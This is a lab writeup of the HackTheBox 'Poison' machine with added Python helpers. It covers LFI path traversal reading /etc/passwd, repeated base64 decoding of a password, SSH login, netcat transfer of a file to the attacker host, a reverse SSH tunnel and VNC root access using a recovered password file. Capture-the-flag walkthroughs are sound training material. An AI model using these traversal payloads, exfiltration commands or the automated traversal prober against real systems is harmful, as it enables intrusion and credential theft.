HackTheBox - Poison Writeup

Source: https://www.absolomb.com/2018-09-08-HackTheBox-Poison/

Poison is a fairly simple box on HackTheBox, but it does contain a few interesting and unusual elements.

Initial

Network Enumeration

As usual, let's start with a quick nmap scan.

root@kali:~# nmap -sV 10.10.10.84

Starting Nmap 7.60 ( https://nmap.org ) at 2018-04-24 12:27 CDT
Nmap scan report for 10.10.10.84
Host is up (0.052s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2 (FreeBSD 20161230; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.29 ((FreeBSD) PHP/5.6.32)
Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd

Looking at port 80 in a browser, we get a page with a Scriptname field and a list of script names to try (shown as a screenshot in the original post).

We can submit each of those filenames in turn. When we submit listfiles.php, the page prints a directory listing (again a screenshot in the original), and pwdbackup.txt is among the files listed.

Note the form of the URL: browse.php takes the filename as a parameter, and the way it loads these files may well be vulnerable to LFI.

Let's look at pwdbackup.txt first, since that one looks interesting.

root@kali:~/htb/poison# curl http://10.10.10.84/browse.php?file=pwdbackup.txt
This password is secure, it's encoded atleast 13 times.. what could go wrong really..

Vm0wd2QyUXlVWGxWV0d4WFlURndVRlpzWkZOalJsWjBUVlpPV0ZKc2JETlhhMk0xVmpKS1IySkVU
bGhoTVVwVVZtcEdZV015U2tWVQpiR2hvVFZWd1ZWWnRjRWRUTWxKSVZtdGtXQXBpUm5CUFdWZDBS
bVZHV25SalJYUlVUVlUxU1ZadGRGZFZaM0JwVmxad1dWWnRNVFJqCk1EQjRXa1prWVZKR1NsVlVW
M040VGtaa2NtRkdaR2hWV0VKVVdXeGFTMVZHWkZoTlZGSlRDazFFUWpSV01qVlRZVEZLYzJOSVRs
WmkKV0doNlZHeGFZVk5IVWtsVWJXaFdWMFZLVlZkWGVHRlRNbEY0VjI1U2ExSXdXbUZEYkZwelYy
eG9XR0V4Y0hKWFZscExVakZPZEZKcwpaR2dLWVRCWk1GWkhkR0ZaVms1R1RsWmtZVkl5YUZkV01G
WkxWbFprV0dWSFJsUk5WbkJZVmpKMGExWnRSWHBWYmtKRVlYcEdlVmxyClVsTldNREZ4Vm10NFYw
MXVUak5hVm1SSFVqRldjd3BqUjJ0TFZXMDFRMkl4WkhOYVJGSlhUV3hLUjFSc1dtdFpWa2w1WVVa
T1YwMUcKV2t4V2JGcHJWMGRXU0dSSGJFNWlSWEEyVmpKMFlXRXhXblJTV0hCV1ltczFSVmxzVm5k
WFJsbDVDbVJIT1ZkTlJFWjRWbTEwTkZkRwpXbk5qUlhoV1lXdGFVRmw2UmxkamQzQlhZa2RPVEZk
WGRHOVJiVlp6VjI1U2FsSlhVbGRVVmxwelRrWlplVTVWT1ZwV2EydzFXVlZhCmExWXdNVWNLVjJ0
NFYySkdjR2hhUlZWNFZsWkdkR1JGTldoTmJtTjNWbXBLTUdJeFVYaGlSbVJWWVRKb1YxbHJWVEZT
Vm14elZteHcKVG1KR2NEQkRiVlpJVDFaa2FWWllRa3BYVmxadlpERlpkd3BOV0VaVFlrZG9hRlZz
WkZOWFJsWnhVbXM1YW1RelFtaFZiVEZQVkVaawpXR1ZHV210TmJFWTBWakowVjFVeVNraFZiRnBW
VmpOU00xcFhlRmRYUjFaSFdrWldhVkpZUW1GV2EyUXdDazVHU2tkalJGbExWRlZTCmMxSkdjRFpO
Ukd4RVdub3dPVU5uUFQwSwo=

Encoded 13 times, fine. Rather than decoding it by hand thirteen times, let's write a quick Python script to do it.

import base64

# The base64 blob from pwdbackup.txt (the taunting first line left out).
string = """
Vm0wd2QyUXlVWGxWV0d4WFlURndVRlpzWkZOalJsWjBUVlpPV0ZKc2JETlhhMk0xVmpKS1IySkVU
bGhoTVVwVVZtcEdZV015U2tWVQpiR2hvVFZWd1ZWWnRjRWRUTWxKSVZtdGtXQXBpUm5CUFdWZDBS
bVZHV25SalJYUlVUVlUxU1ZadGRGZFZaM0JwVmxad1dWWnRNVFJqCk1EQjRXa1prWVZKR1NsVlVW
M040VGtaa2NtRkdaR2hWV0VKVVdXeGFTMVZHWkZoTlZGSlRDazFFUWpSV01qVlRZVEZLYzJOSVRs
WmkKV0doNlZHeGFZVk5IVWtsVWJXaFdWMFZLVlZkWGVHRlRNbEY0VjI1U2ExSXdXbUZEYkZwelYy
eG9XR0V4Y0hKWFZscExVakZPZEZKcwpaR2dLWVRCWk1GWkhkR0ZaVms1R1RsWmtZVkl5YUZkV01G
WkxWbFprV0dWSFJsUk5WbkJZVmpKMGExWnRSWHBWYmtKRVlYcEdlVmxyClVsTldNREZ4Vm10NFYw
MXVUak5hVm1SSFVqRldjd3BqUjJ0TFZXMDFRMkl4WkhOYVJGSlhUV3hLUjFSc1dtdFpWa2w1WVVa
T1YwMUcKV2t4V2JGcHJWMGRXU0dSSGJFNWlSWEEyVmpKMFlXRXhXblJTV0hCV1ltczFSVmxzVm5k
WFJsbDVDbVJIT1ZkTlJFWjRWbTEwTkZkRwpXbk5qUlhoV1lXdGFVRmw2UmxkamQzQlhZa2RPVEZk
WGRHOVJiVlp6VjI1U2FsSlhVbGRVVmxwelRrWlplVTVWT1ZwV2EydzFXVlZhCmExWXdNVWNLVjJ0
NFYySkdjR2hhUlZWNFZsWkdkR1JGTldoTmJtTjNWbXBLTUdJeFVYaGlSbVJWWVRKb1YxbHJWVEZT
Vm14elZteHcKVG1KR2NEQkRiVlpJVDFaa2FWWllRa3BYVmxadlpERlpkd3BOV0VaVFlrZG9hRlZz
WkZOWFJsWnhVbXM1YW1RelFtaFZiVEZQVkVaawpXR1ZHV210TmJFWTBWakowVjFVeVNraFZiRnBW
VmpOU00xcFhlRmRYUjFaSFdrWldhVkpZUW1GV2EyUXdDazVHU2tkalJGbExWRlZTCmMxSkdjRFpO
Ukd4RVdub3dPVU5uUFQwSwo=
"""


def decode(b64_string, iterations):
    # b64decode() silently drops the embedded newlines, so each round's
    # output can be fed straight back in as the next round's input.
    for _ in range(iterations):
        b64_string = base64.b64decode(b64_string).decode('utf-8')
    return b64_string


if __name__ == '__main__':
    print(decode(string, 13))

Run the script:

root@kali:~/htb/poison# python3 decode.py
Charix!2#4%6&8(0
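The script above hard-codes the 13 rounds that the note announced. As an added example (not from the original writeup), here is a version that works out the count on its own: it peels layers until the data is no longer valid base64, or would decode to something that is not text, which guards against a final plaintext that happens to look like base64. The 13-layer blob it is tested against is constructed inside the block with wrap_base64, not read from pwdbackup.txt.

```python
import base64
import binascii
from typing import Tuple


def looks_like_text(data: bytes) -> bool:
    """Accept printable ASCII plus whitespace only; both base64 layers and the
    final password are text, anything else means we decoded one layer too far."""
    return all(32 <= b < 127 or b in (9, 10, 13) for b in data)


def peel_base64(blob: str, max_layers: int = 64) -> Tuple[str, int]:
    """Decode repeatedly until the current value is no longer valid base64 (or
    would decode to non-text). Returns (plaintext, number_of_layers_removed)."""
    current = blob
    for layer in range(max_layers):
        # Drop embedded newlines/spaces, just as b64decode() would do by default.
        compact = "".join(current.split())
        try:
            decoded = base64.b64decode(compact, validate=True)
        except (binascii.Error, ValueError):
            return current, layer          # not base64 any more: this is the payload
        if not looks_like_text(decoded):
            return current, layer          # valid base64 by accident, but binary junk
        current = decoded.decode("ascii")
    return current, max_layers


def wrap_base64(plaintext: str, layers: int) -> str:
    """Constructed test input: nest a string the way pwdbackup.txt was built."""
    data = plaintext.encode()
    for _ in range(layers):
        data = base64.b64encode(data)
    return data.decode()


if __name__ == "__main__":
    # Constructed sample: the recovered password wrapped 13 times, not the real file.
    sample = wrap_base64("Charix!2#4%6&8(0", 13)
    text, layers = peel_base64(sample)
    print(f"{layers} layers removed, payload: {text}")   # 13 layers removed, payload: Charix!2#4%6&8(0
```

The text check matters for short passwords: a plaintext such as "abcd" is syntactically valid base64, and without it the loop would decode once more and hand back three garbage bytes.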

OK! We have the password, but we still need a username. Let's test whether the LFI is real.

root@kali:~/htb/poison# curl http://10.10.10.84/browse.php?file=../../../etc/passwd

<br />
<b>Warning</b>:  include(../../../etc/passwd): failed to open stream: No such file or directory in <b>/usr/local/www/apache24/data/browse.php</b> on line <b>2</b><br />
<br />
<b>Warning</b>:  include(): Failed opening '../../../etc/passwd' for inclusion (include_path='.:/usr/local/www/apache24/data') in <b>/usr/local/www/apache24/data/browse.php</b> on line <b>2</b><br />

Here we can see that include() is being used, and the warning leaks the include path, /usr/local/www/apache24/data. That directory is five levels deep, so three ../ only got us to /usr/local/etc/passwd; we need five to reach the root of the filesystem (more would also work, since .. at / stays at /).

root@kali:~/htb/poison# curl http://10.10.10.84/browse.php?file=../../../../../etc/passwd
# $FreeBSD: releng/11.1/etc/master.passwd 299365 2016-05-10 12:47:36Z bcr$
#
root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13:Games pseudo-user:/:/usr/sbin/nologin
news:*:8:8:News Subsystem:/:/usr/sbin/nologin
man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
unbound:*:59:59:Unbound DNS Resolver:/var/unbound:/usr/sbin/nologin
proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
auditdistd:*:78:77:Auditdistd unprivileged user:/var/empty:/usr/sbin/nologin
www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
_ypldap:*:160:160:YP LDAP unprivileged user:/var/empty:/usr/sbin/nologin
hast:*:845:845:HAST unprivileged user:/var/empty:/usr/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
_tss:*:601:601:TrouSerS user:/var/empty:/usr/sbin/nologin
messagebus:*:556:556:D-BUS Daemon User:/nonexistent:/usr/sbin/nologin
avahi:*:558:558:Avahi Daemon User:/nonexistent:/usr/sbin/nologin
cups:*:193:193:Cups Owner:/nonexistent:/usr/sbin/nologin
charix:*:1001:1001:charix:/home/charix:/bin/csh
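The depth reasoning above can be automated rather than guessed. The following is an added example, not part of the original writeup: it simulates how include() resolves a relative file parameter against the web root leaked in the warning, then probes increasing numbers of ../ until a marker string from /etc/passwd shows up in the response. The fake filesystem is constructed for the demonstration; http_fetcher is the same probe wired to the real browse.php?file= parameter and is the only part that needs a live target.

```python
import posixpath
import urllib.parse
import urllib.request
from typing import Callable, Optional

# Web root taken from the PHP warning above.
DOC_ROOT = "/usr/local/www/apache24/data"

# Constructed stand-in for the target filesystem: only the paths the demo needs.
FAKE_FS = {
    "/etc/passwd": "root:*:0:0:Charlie &:/root:/bin/csh\n"
                   "charix:*:1001:1001:charix:/home/charix:/bin/csh\n",
    DOC_ROOT + "/pwdbackup.txt": "This password is secure, it's encoded atleast 13 times..\n",
}


def simulated_include(file_param: str) -> str:
    """Resolve ?file= the way include() does for a relative path: against the web root."""
    resolved = posixpath.normpath(posixpath.join(DOC_ROOT, file_param))
    if resolved in FAKE_FS:
        return FAKE_FS[resolved]
    return ("Warning: include(%s): failed to open stream: No such file or directory"
            % file_param)


def traversal_payload(depth: int, target: str) -> str:
    """'../' repeated depth times, followed by the target path without its leading slash."""
    return "../" * depth + target.lstrip("/")


def find_traversal_depth(fetch: Callable[[str], str], target: str = "/etc/passwd",
                         marker: str = "root:", max_depth: int = 12) -> Optional[int]:
    """Smallest number of '../' for which the marker appears in the response, or None."""
    for depth in range(max_depth + 1):
        if marker in fetch(traversal_payload(depth, target)):
            return depth
    return None


def http_fetcher(base_url: str) -> Callable[[str], str]:
    """Fetcher for a live browse.php?file= endpoint (assumed URL layout, as on the page)."""
    def fetch(file_param: str) -> str:
        url = base_url + "?file=" + urllib.parse.quote(file_param, safe="/")
        with urllib.request.urlopen(url, timeout=10) as resp:
            return resp.read().decode("utf-8", errors="replace")
    return fetch


if __name__ == "__main__":
    depth = find_traversal_depth(simulated_include)
    print("traversal depth:", depth)   # 5 for the web root above
    # Against the real box:
    # find_traversal_depth(http_fetcher("http://10.10.10.84/browse.php"))
```

Because normpath clamps .. at the root, any depth of five or more reaches /etc/passwd; the probe reports the smallest one, which is what you want when the include path is not leaked and you have to infer it.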

There is a user called charix. Let's try SSH with that username and the password we recovered.

root@kali:~/htb/poison# ssh charix@10.10.10.84
Password for charix@Poison:
Last login: Mon Mar 19 16:38:00 2018 from 10.10.14.4
FreeBSD 11.1-RELEASE (GENERIC) #0 r321309: Fri Jul 21 02:08:28 UTC 2017
Welcome to FreeBSD!
Release Notes, Errata: https://www.FreeBSD.org/releases/
Security Advisories:   https://www.FreeBSD.org/security/
FreeBSD Handbook:      https://www.FreeBSD.org/handbook/
FreeBSD FAQ:           https://www.FreeBSD.org/faq/
Questions List: https://lists.FreeBSD.org/mailman/listinfo/freebsd-questions/
FreeBSD Forums:        https://forums.FreeBSD.org/
Documents installed with the system are in the /usr/local/share/doc/freebsd/
directory, or can be installed later with:  pkg install en-freebsd-doc
For other languages, replace "en" with a language code like de or fr.
Show the version of FreeBSD installed:  freebsd-version ; uname -a
Please include that output and any error messages when posting questions.
Introduction to manual pages:  man man
FreeBSD directory layout:      man hier
Edit /etc/motd to change this login announcement.
You can often get answers to your questions about FreeBSD by searching in the
FreeBSD mailing list archives at
        http://www.FreeBSD.org/search/search.html
charix@Poison:~ %

Excellent!

Privilege Escalation

Looking in the home directory, we see a suspicious zip file.

charix@Poison:~ % ls -al
total 48
drwxr-x---  2 charix  charix   512 Mar 19 17:16 .
drwxr-xr-x  3 root    wheel    512 Mar 19 16:08 ..
-rw-r-----  1 charix  charix  1041 Mar 19 17:16 .cshrc
-rw-rw----  1 charix  charix     0 Mar 19 17:17 .history
-rw-r-----  1 charix  charix   254 Mar 19 16:08 .login
-rw-r-----  1 charix  charix   163 Mar 19 16:08 .login_conf
-rw-r-----  1 charix  charix   379 Mar 19 16:08 .mail_aliases
-rw-r-----  1 charix  charix   336 Mar 19 16:08 .mailrc
-rw-r-----  1 charix  charix   802 Mar 19 16:08 .profile
-rw-r-----  1 charix  charix   281 Mar 19 16:08 .rhosts
-rw-r-----  1 charix  charix   849 Mar 19 16:08 .shrc
-rw-r-----  1 root    charix   166 Mar 19 16:35 secret.zip
-rw-r-----  1 root    charix    33 Mar 19 16:11 user.txt

Let's pull the zip over to our local machine with netcat. Compare a checksum on both ends afterwards (sha256 on FreeBSD, sha256sum on Kali): a timeout-based nc transfer gives no indication if it is cut short.

charix@Poison:~ % nc -w 2 10.10.14.8 443 < secret.zip
root@kali:~/htb/poison# nc -lvnp 443 > secret.zip
listening on [any] 443 ...
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.84] 13787

The zip is password-protected, but we can try charix's SSH password on it. And it works!

root@kali:~/htb/poison# unzip secret.zip
Archive:  secret.zip
[secret.zip] secret password:
 extracting: secret

Checking the file type, file reports it as plain (extended-ASCII) text.

root@kali:~/htb/poison# file secret
secret: Non-ISO extended-ASCII text, with no line terminators
root@kali:~/htb/poison# cat secret
[|Ֆz!

The contents, however, are just garbage bytes. Let's look around the box some more. Checking the running processes with ps aux, we find a couple of interesting entries.

root    529   0.0  0.9  23620  8996 v0- I    19:17     0:00.22 Xvnc :1 -desktop X -httpd /usr/local/share/tightvnc/classes -auth /root/.Xauthority -geo
root    540   0.0  0.7  67220  7060 v0- I    19:17     0:00.07 xterm -geometry 80x24+10+10 -ls -title X Desktop

We also see some ports listening only on localhost.

charix@Poison:~ % netstat -an
Active Internet connections (including servers)
Proto Recv-Q Send-Q Local Address          Foreign Address        (state)
tcp4       0      0 10.10.10.84.22         10.10.14.8.44976       ESTABLISHED
tcp4       0      0 127.0.0.1.25           *.*                    LISTEN
tcp4       0      0 *.80                   *.*                    LISTEN
tcp6       0      0 *.80                   *.*                    LISTEN
tcp4       0      0 *.22                   *.*                    LISTEN
tcp6       0      0 *.22                   *.*                    LISTEN
tcp4       0      0 127.0.0.1.5801         *.*                    LISTEN
tcp4       0      0 127.0.0.1.5901         *.*                    LISTEN
udp4       0      0 *.514                  *.*
udp6       0      0 *.514                  *.*

Ports 5801 and 5901 are the standard VNC ports for display :1 (5800+1 for the HTTP/Java viewer, 5900+1 for RFB), which matches the Xvnc :1 session we saw in the process list. Both listen only on 127.0.0.1, so we need to forward one of them to our local machine (make sure SSH is running on your local machine, since this uses a reverse tunnel back to it!). A local forward from Kali, ssh -L 5901:127.0.0.1:5901 charix@10.10.10.84, would work just as well and avoids logging into the attack box as root from the target.
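Spotting loopback-only listeners is the step that tells you a tunnel is worth building. As an added example that is not from the original writeup, the parser below reads FreeBSD netstat -an output (note the host.port form, where the port is appended with a dot, so the address has to be split from the right), keeps only listening sockets, reports the ports bound solely to 127.0.0.1 or ::1, and maps the VNC-range ports back to a display number using the 5800/5900 bases. The sample input is the netstat output shown above, embedded as a constant.

```python
from typing import Dict, List, Set, Tuple

# Constructed sample: the netstat -an output shown above (FreeBSD format).
NETSTAT_OUTPUT = """\
Active Internet connections (including servers)
Proto Recv-Q Send-Q Local Address          Foreign Address        (state)
tcp4       0      0 10.10.10.84.22         10.10.14.8.44976       ESTABLISHED
tcp4       0      0 127.0.0.1.25           *.*                    LISTEN
tcp4       0      0 *.80                   *.*                    LISTEN
tcp6       0      0 *.80                   *.*                    LISTEN
tcp4       0      0 *.22                   *.*                    LISTEN
tcp6       0      0 *.22                   *.*                    LISTEN
tcp4       0      0 127.0.0.1.5801         *.*                    LISTEN
tcp4       0      0 127.0.0.1.5901         *.*                    LISTEN
udp4       0      0 *.514                  *.*
udp6       0      0 *.514                  *.*
"""

LOOPBACK = {"127.0.0.1", "::1"}
# VNC convention: display N serves RFB on 5900+N and the Java/HTTP viewer on 5800+N.
VNC_BASES = {"rfb": 5900, "http": 5800}


def split_bsd_addr(addr: str) -> Tuple[str, int]:
    """BSD netstat prints host.port ('127.0.0.1.5901', '*.80'): split on the last dot."""
    host, _, port = addr.rpartition(".")
    return host, int(port)


def listening_sockets(netstat_text: str) -> List[Tuple[str, str, int]]:
    """(proto, host, port) for every listening TCP socket and every bound UDP socket."""
    rows = []
    for line in netstat_text.splitlines():
        fields = line.split()
        if len(fields) < 5 or not fields[0].startswith(("tcp", "udp")):
            continue  # header lines
        proto, local = fields[0], fields[3]
        state = fields[5] if len(fields) > 5 else ""  # UDP rows carry no state column
        if proto.startswith("tcp") and state != "LISTEN":
            continue  # established/closing connections are not services
        host, port = split_bsd_addr(local)
        rows.append((proto, host, port))
    return rows


def loopback_only_ports(netstat_text: str) -> Set[int]:
    """Ports whose every listener is bound to loopback: reachable only through a tunnel."""
    hosts_by_port: Dict[int, Set[str]] = {}
    for _proto, host, port in listening_sockets(netstat_text):
        hosts_by_port.setdefault(port, set()).add(host)
    return {port for port, hosts in hosts_by_port.items() if hosts <= LOOPBACK}


def vnc_displays(ports) -> Dict[int, Tuple[str, int]]:
    """Map ports in the VNC ranges back to (service, display number)."""
    found = {}
    for port in ports:
        for service, base in VNC_BASES.items():
            if base < port < base + 100:
                found[port] = (service, port - base)
    return found


if __name__ == "__main__":
    local_only = loopback_only_ports(NETSTAT_OUTPUT)
    print("loopback-only ports:", sorted(local_only))   # [25, 5801, 5901]
    print("VNC candidates:", vnc_displays(local_only))   # 5801 -> http :1, 5901 -> rfb :1
```

Port 25 shows up too: it is loopback-only as well, just not interesting here. The display number the parser recovers (:1) is the one to cross-check against the Xvnc :1 line in the ps output before building the forward.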

charix@Poison:~ % ssh -l root -R 5801:127.0.0.1:5901 10.10.14.8
root@10.10.14.8's password:
The programs included with the Kali GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Kali GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
root@kali:~#

Checking the listening sockets on Kali confirms the forward is up: local port 5801 now leads to the VNC server on Poison.

root@kali:~# netstat -ant
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
tcp        0      0 127.0.0.1:5801          0.0.0.0:*               LISTEN
tcp        0      0 10.10.14.8:44976        10.10.10.84:22          ESTABLISHED
tcp        0      0 10.10.14.8:22           10.10.10.84:54672       ESTABLISHED
tcp6       0      0 :::22                   :::*                    LISTEN
tcp6       0      0 ::1:5801                :::*                    LISTEN

vncviewer supports a -passwd option that takes a password file for standard VNC authentication. A VNC password file is nothing more than the password obfuscated with DES under a fixed key that every VNC implementation shares, so it looks like a few bytes of binary junk, exactly like the secret file we extracted. Let's try passing that file straight to vncviewer.

root@kali:~/htb/poison# vncviewer -h
TightVNC Viewer version 1.3.9
Usage: vncviewer [<OPTIONS>] [<HOST>][:<DISPLAY#>]
       vncviewer [<OPTIONS>] [<HOST>][::<PORT#>]
       vncviewer [<OPTIONS>] -listen [<DISPLAY#>]
       vncviewer -help
<OPTIONS> are standard Xt options, or:
        -via <GATEWAY>
        -shared (set by default)
        -noshared
        -viewonly
        -fullscreen
        -noraiseonbeep
        -passwd <PASSWD-FILENAME> (standard VNC authentication)

root@kali:~/htb/poison# vncviewer -passwd secret 127.0.0.1:5801
Connected to RFB server, using protocol version 3.8
Enabling TightVNC protocol extensions
Performing standard VNC authentication
Authentication successful
Desktop name "root's X desktop (Poison:1)"

And that's it, we're in on root's desktop!

Originally published on the WeChat official account 安恒网络空间安全讲武堂 (cyberslab)

Original publication date: 2018-11-22
